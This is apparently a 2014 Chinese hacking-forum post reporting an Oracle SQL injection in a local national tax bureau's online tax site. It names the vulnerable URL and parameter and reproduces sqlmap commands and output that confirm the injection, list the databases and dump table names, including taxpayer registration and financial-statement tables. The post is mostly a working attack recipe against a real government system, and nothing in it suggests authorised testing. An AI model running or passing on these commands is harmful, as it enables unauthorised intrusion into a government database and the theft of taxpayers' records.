某地国家税务局存在Oracle注入下载

来源:黑吧安全网 浏览:915次 时间:2014-07-19
做网站找雨过天晴工作室

某地国家税务局存在注入,不多说看下面

https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/zhinan.jsp?lcdm=88


GET parameter 'lcdm' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 104 HTTP(s) requests:
---
Place: GET
Parameter: lcdm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lcdm=88 AND 5155=5155
---
[11:46:08] [INFO] testing MySQL
[11:46:09] [WARNING] the back-end DBMS is not MySQL
[11:46:09] [INFO] testing Oracle
[11:46:10] [INFO] confirming Oracle
[11:46:10] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP 2.1, Apache 2.2.26
back-end DBMS: Oracle


sqlmap -u "https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/zhinan.jsp?lcdm=88" --dbs

available databases [4]:
[*] NSFW
[*] SYS
[*] SYSTEM
[*] WMSYS

sqlmap -u "https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/zhinan.jsp?lcdm=88" --tables -D "NSFW"

[12:00:59] [INFO] resumed: SB_DY_DZJKPZ
[12:00:59] [INFO] resumed: SB_CWBB_ZCFZB_KJZD
[12:00:59] [INFO] resumed: SB_CWBB_ZCFZB_SYYH
[12:00:59] [INFO] resumed: SB_CWBB_ZCFZB_XQY
[12:00:59] [INFO] resumed: SB_CWBB_ZCFZB_YBQY
[12:00:59] [INFO] resumed: SB_CWBB_ZCFZB_ZQGS
[12:00:59] [INFO] resumed: DJ_NSRXX_BS
[12:00:59] [INFO] resumed: DJ_NSRXX_LXXX
[12:00:59] [INFO] resumed: DM_BDMB
[12:00:59] [INFO] resumed: DM_CWBBZL
[12:00:59] [INFO] resumed: DM_CZRY



由于表太多。机器太差劲没有跑完。这样就差不多了